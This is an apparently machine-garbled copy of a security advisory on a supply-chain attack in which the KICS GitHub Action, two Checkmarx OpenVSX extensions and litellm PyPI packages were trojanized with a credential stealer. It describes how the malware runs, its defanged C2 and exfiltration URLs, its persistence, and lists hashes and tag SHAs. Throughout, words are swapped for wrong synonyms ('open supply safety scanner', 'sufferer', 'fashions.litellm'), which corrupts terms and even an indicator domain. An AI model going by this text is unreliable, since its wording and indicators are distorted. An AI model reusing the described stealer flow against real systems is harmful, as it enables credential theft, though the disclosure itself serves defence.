The KICS GitHub Action was compromised with credential-stealing malware by TeamPCP, the identical group behind the Trivy attack. KICS is an open supply infrastructure as code safety scanner by Checkmarx. Between 12:58 and 16:50 UTC on March twenty third, any customers of this GitHub Action who have been pinning to one of many compromised tags would have been served the malware. The repository was taken down at 16:50 UTC, shortly after a GitHub issue was filed by a user notifying the maintainers of the incident.
The motion was accessible at https://github.com/Checkmarx/kics-github-action previous to takedown.
Update 03/24:
11:30 UTC: The “litellm” packages (variations 1.82.7 and 1.82.8) on PyPI have been trojanized. They comprise with the identical performance because the earlier operation, however utilizing a brand new exfiltration area: fashions.litellm[.]cloud. The malicious replace was revealed at roughly 8:30 UTC and was been quarantined by PyPI at 11:25 UTC. Wiz clients can see an advisory within the Threat Center.
Updates 03/23:
19:24 UTC: The repository has been reinstated, and the maintainers state “The issue is resolved now.”
22:25 UTC: Sysdig experiences that ast-github-action was additionally impacted. They have been restricted to observing a single malicious tag 2.3.28 – nonetheless based mostly on TeamPCPs ways, we consider it’s probably all tags have been impacted.
22:35 UTC: Based on a tip from impartial researcher Adnan Khan, Wiz has confirmed that Checkmarx OpenVSX extensions cx-dev-assist 1.7.0 and ast-results 2.53.0 have been compromised. This was concurrently reported by ReversingLabs via tweet. See “OpenVSX Payload” part under for particulars. We have reported these to OpenVSX for removing.
Update 03/24 9:00 UTC: Checkmarx have revealed a Security Update addressing the problems with the KICS GitHub motion and OpenVSX plugins. They state a decision time of 15:41 UTC for OpenVSX, nonetheless we noticed the malicious variations have been current on the time of our report. Additionally, whereas new variations have been pushed, the malicious variations have but to be eliminated.
This is the second standard open supply safety scanner that this group has compromised within the final 5 days. The operation makes use of acquainted naming conventions and the identical RSA public key, permitting Wiz to evaluate with excessive confidence that it’s the identical actor.
KICS Github Action Payload
The malicious code was injected in the identical method because the Trivy incident:
The attacker staged imposter commits (commits on a fork of the repository) containing their payload:
setup.shThe attacker then used what seems to be a compromised id to immediately replace all 35 tags within the challenge and level them to these staged commits
The malware additionally capabilities equally, however with just a few key variations:
This model makes use of a brand new C2 area:
checkmarx.zone.The new model creates a
docs-tpcprepository by way of the sufferer’sGITHUB_TOKENs as a fallback to C2 disruption. In the Trivy incident,tpcp-docswas used as an alternative.This model provides Kubernetes targeted persistence code, along with the present credential stealing and exfiltration code.
While kics-github-action has ~1% of the seen public utilization of trivy-action, it’s nonetheless broadly adopted publicly and privately as an Infrastructure as Code safety scanner.
We will replace this publish with additional evaluation.
Github Compromise
The assault seems to have been completed by way of the compromise of the cx-plugins-releases (GitHub ID 225848595) service account, as that’s the id concerned in publishing the malicious tags.
OpenVSX Payload
Both compromised extensions (ast-results v2.53.0 and cx-dev-assist v1.7.0) contained similar payloads. They have been revealed 12 seconds aside at 12:53 UTC on March 23, 2026, by way of the ast-phoenix account on Open VSX. The VS Code Marketplace variations seem unaffected.
Payload Execution Flow
On activation of the extension, the brand new malicious
environmentAuthChecker.jsis invoked fromactivateCore.jsThis payload first checks if the sufferer has credentials for not less than one cloud supplier
If any credentials are detected, the second-stage payload is retrieved from the C2: checkmarx[.]zone/static/checkmarx-util-1.0.4.tgz
The payload makes an attempt execution by way of npx, bunx, pnpx, or yarn dlx. This covers main JavaScript package deal managers. The retrieved package deal contrains a complete credential stealer.
Harvested credentials are then encrpyted, utilizing the keys as elsewhere on this marketing campaign, and exfiltrated to
checkmarx[.]zone/vsxastpcp.tar.gz.
On non-CI techniques, the malware installs persistence by way of a systemd consumer service. The persistence script polls https://checkmarx[.]zone/raw each 50 minutes for extra payloads, with a kill swap that aborts if the response accommodates “youtube”. Currently, the hyperlink redirects to The Show Must Go On by Queen.
Compromised Artifacts
OpenVSX Extensions
| Artifact | SHA256 |
|---|---|
| ast-results-2.53.0.vsix | 65bd72fcddaf938cefdf55b3323ad29f649a65d4ddd6aea09afa974dfc7f105d |
| cx-dev-assist-1.7.0.vsix | 744c9d61b66bcd2bb5474d9afeee6c00bb7e0cd32535781da188b80eb59383e0 |
| checkmarx-util-1.0.4.tgz | 0d66d8c7e02574ff0d3443de0585af19c903d12466d88573ed82ec788655975c |
| environmentAuthChecker.js | 527f795a201a6bc114394c4cfd1c74dce97381989f51a4661aafbc93a4439e90 |
kics-github-action Releases
The v1.1 release was the one malicious launch created. Other releases, triggered routinely by the tag occasions, failed as a result of these variations already existed.
kics-github-action Tags
| Tag | Commit SHA |
|---|---|
| v1 | 0e22ec8d1e0dda3c62bf4beffcd4a8a5db1abda1 |
| v1.0 | 45f3749467a6017cb4fb749054b498d149dd5924 |
| v1.1 | 8e20c7a67bb95632e2040327a355fb97e6014d29 |
| v1.2 | 93de85c910d859b759cf9185aa78d5a23a4b7000 |
| v1.3 | 0e7343ba084735863db92b6f8ba2fa9dee604f7c |
| v1.4 | 2dc0fa613f6f4c15f26ad98225ad253475681616 |
| v1.5 | f00191dd3352c0cd83c6cce4e6bf04b628214dd0 |
| v1.6 | e0359b1a253ee66c8018586c3225e6e9cd2d8a4f |
| v1.6.1 | dc6dbf358998c0c64da83edc8fcd581c12656b19 |
| v1.6.2 | 08b9ea97eb292d5e1f9ac2d8e21c0ba32f0fdff0 |
| v1.6.3 | 005fb0837553de722f8bf11d98e905dbdde19861 |
| v1.7.0 | a5471d37c656ecd4560e8e0b3977910f27025618 |
| v2 | 3d49875ed47c6b8b4c8b50e0421418cf6b9f35f4 |
| v2.0.0 | 121c38fb49c9fc82160245fb6e2a9119db636e4d |
| v2.1.0 | 1e9eeaba37fe0032deba133f598e74dab0ceb3b7 |
| v2.1.1 | c5c07508527fc6a125855eebfb533e64f675bd8e |
| v2.1.2 | c999dbb9cc904e23675f9929f7e0e51d132879cf |
| v2.1.3 | 4ebf62dd8ff318412b38d19841fc3c8650e294bf |
| v2.1.4 | 3ae9f0d6f8139964635d411149f9b3e0a6eb935e |
| v2.1.5 | 96a0e8eb31c3cce6c495c9a49dd49c881cd17934 |
| v2.1.6 | 31fbf5831a2e52429738fdc0cbaa20e57872b6fc |
| v2.1.7 | fca3a20afcb8ec7f9932c060a236d2a9021fdd2b |
| v2.1.8 | 0f81f132f9f09bb4976d403914a44a1a1eb6158d |
| v2.1.9 | c0e23718a5074f3b8ad286f37b532e02057af35f |
| v2.1.10 | d66f0657133bc42f8264458063999bf1910490db |
| v2.1.11 | e35c9d6a5faffc1c5b3450d0bf09006aa9b9e906 |
| v2.1.12 | 2eee333d70fb6e14ce1d4aa73f12058bc5d70193 |
| v2.1.13 | f9641eb512f5c6530d13275903e8a97baf0925f1 |
| v2.1.14 | e8754eebc822b5122e96a6142b28dbc0e179c91c |
| v2.1.15 | 69b3f020390222a9fcb6029ba56533b2fb12f103 |
| v2.1.16 | db942a0dd7e9d1aeac72bc675bdb67f39a688b63 |
| v2.1.17 | 208813bf5feca5df9a935363cd426bc914614d0b |
| v2.1.18 | 3fdeadb81fbeddc1453163cc87bc173911fd47e2 |
| v2.1.19 | 310734c0ffd29438f6195a24e2cbbacfdc33c9ab |
| v2.1.20 | b974e53df1e3a2cd22ea90f0ec01882394feede4 |
Which actions ought to safety groups take?
Audit KICS GitHub Actions references: Review workflows utilizing
kics-github-action. If you referenced a model tag reasonably than a SHA, verify workflow run logs from the publicity window for indicators of compromise.Search for exfiltration artifacts: Look for repositories named
docs-tpcpin your GitHub group, which can point out profitable exfiltration by way of the fallback mechanism.
Long-term hardening: Refer to Wiz’s How to Harden GitHub Actions: The Unofficial Guide
How can Wiz assist?
Wiz clients ought to proceed to watch the advisory within the Wiz Threat Center for ongoing steerage, pre-built queries, and references to related detections they will use to evaluate the danger of their surroundings.
Worried you’ve been impacted? Connect with the Wiz Incident Response team.
